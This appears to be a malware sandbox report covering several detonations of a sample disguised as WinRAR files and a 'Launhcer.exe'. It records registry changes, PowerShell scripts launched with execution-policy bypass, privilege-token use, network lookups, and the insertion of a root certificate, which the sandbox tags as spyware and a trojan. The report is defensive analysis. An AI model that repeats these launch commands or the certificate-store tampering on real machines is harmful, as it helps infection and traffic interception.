Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2952

Network

Country Destination Domain Proto
US 8.8.8.8:53 notifier.rarlab.com udp
DE 51.195.68.172:80 notifier.rarlab.com tcp
DE 51.195.68.172:443 notifier.rarlab.com tcp
US 8.8.8.8:53 172.68.195.51.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
DE 51.195.68.172:443 notifier.rarlab.com tcp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\QsVakRcJSHTg.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\QsVakRcJSHTg.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x308

Network

Country Destination Domain Proto
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

memory/3356-5-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp

memory/3356-4-0x0000014A38C10000-0x0000014A38C32000-memory.dmp

memory/3356-6-0x0000014A38A60000-0x0000014A38A70000-memory.dmp

memory/3356-7-0x0000014A38A60000-0x0000014A38A70000-memory.dmp

memory/3356-10-0x0000014A512E0000-0x0000014A51356000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnusit1r.t20.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3356-31-0x0000014A38A60000-0x0000014A38A70000-memory.dmp

memory/3356-37-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\Qt5Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\Qt5Core.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

113s

Max time network

140s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\9syz0JDU8L0Z.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\9syz0JDU8L0Z.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp

Files

memory/4872-4-0x000002D670530000-0x000002D670552000-memory.dmp

memory/4872-5-0x00007FFF60DF0000-0x00007FFF617DC000-memory.dmp

memory/4872-6-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-8-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-10-0x000002D670BC0000-0x000002D670C36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pbfvhjcj.fgz.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4872-33-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-34-0x00007FFF60DF0000-0x00007FFF617DC000-memory.dmp

memory/4872-35-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-36-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-37-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

114s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\UNRAR64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\UNRAR64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

118s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp

Files

memory/1364-4-0x000002AF3AAC0000-0x000002AF3AAE2000-memory.dmp

memory/1364-5-0x00007FFAABF20000-0x00007FFAAC90C000-memory.dmp

memory/1364-8-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-9-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-10-0x000002AF53270000-0x000002AF532E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5pncfkb.0xq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1364-31-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-34-0x00007FFAABF20000-0x00007FFAAC90C000-memory.dmp

memory/1364-35-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-36-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-37-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

117s

Max time network

137s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp

Files

memory/3012-4-0x0000019B0AA10000-0x0000019B0AA32000-memory.dmp

memory/3012-5-0x00007FFDDEC80000-0x00007FFDDF66C000-memory.dmp

memory/3012-6-0x0000019B23050000-0x0000019B23060000-memory.dmp

memory/3012-9-0x0000019B23160000-0x0000019B231D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q2ur3mid.bgj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3012-32-0x0000019B23050000-0x0000019B23060000-memory.dmp

memory/3012-33-0x00007FFDDEC80000-0x00007FFDDF66C000-memory.dmp

memory/3012-34-0x0000019B23050000-0x0000019B23060000-memory.dmp

memory/3012-35-0x0000019B23050000-0x0000019B23060000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4808 wrote to memory of 696 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4808 wrote to memory of 696 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4808 wrote to memory of 696 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

119s

Max time network

137s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp

Files

memory/4716-4-0x00000228F1290000-0x00000228F12B2000-memory.dmp

memory/4716-5-0x00007FFF28DA0000-0x00007FFF2978C000-memory.dmp

memory/4716-6-0x00000228F1110000-0x00000228F1120000-memory.dmp

memory/4716-9-0x00000228F1900000-0x00000228F1976000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtdoqz04.3ky.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4716-30-0x00000228F1110000-0x00000228F1120000-memory.dmp

memory/4716-33-0x00007FFF28DA0000-0x00007FFF2978C000-memory.dmp

memory/4716-34-0x00000228F1110000-0x00000228F1120000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240214-en

Max time kernel

118s

Max time network

129s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMZIP64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMZIP64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

64s

Max time network

90s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\NcHGDdjDw8Ov.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\NcHGDdjDw8Ov.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/4372-4-0x000001613B3F0000-0x000001613B412000-memory.dmp

memory/4372-7-0x000001613B5A0000-0x000001613B616000-memory.dmp

memory/4372-16-0x00007FFAB2650000-0x00007FFAB303C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bf25stib.u4r.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4372-17-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-18-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-32-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-34-0x00007FFAB2650000-0x00007FFAB303C000-memory.dmp

memory/4372-35-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-36-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-37-0x0000016122E60000-0x0000016122E70000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240214-en

Max time kernel

118s

Max time network

130s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\jqP27MaT7teI.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\jqP27MaT7teI.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x41c

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/3168-4-0x00007FF8E6830000-0x00007FF8E721C000-memory.dmp

memory/3168-5-0x0000021C22490000-0x0000021C224B2000-memory.dmp

memory/3168-7-0x0000021C22500000-0x0000021C22510000-memory.dmp

memory/3168-6-0x0000021C22500000-0x0000021C22510000-memory.dmp

memory/3168-10-0x0000021C22790000-0x0000021C22806000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5msxsfyw.pkv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3168-31-0x0000021C22500000-0x0000021C22510000-memory.dmp

memory/3168-37-0x00007FF8E6830000-0x00007FF8E721C000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\mtgtTlysOs1Z.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\mtgtTlysOs1Z.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x380

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp

Files

memory/192-4-0x000002B864780000-0x000002B8647A2000-memory.dmp

memory/192-5-0x00007FF8DA030000-0x00007FF8DAA1C000-memory.dmp

memory/192-6-0x000002B84C300000-0x000002B84C310000-memory.dmp

memory/192-7-0x000002B84C300000-0x000002B84C310000-memory.dmp

memory/192-10-0x000002B864930000-0x000002B8649A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bxtcg1as.rfm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/192-31-0x000002B84C300000-0x000002B84C310000-memory.dmp

memory/192-37-0x00007FF8DA030000-0x00007FF8DAA1C000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

63s

Max time network

84s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

121s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"

Signatures

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb9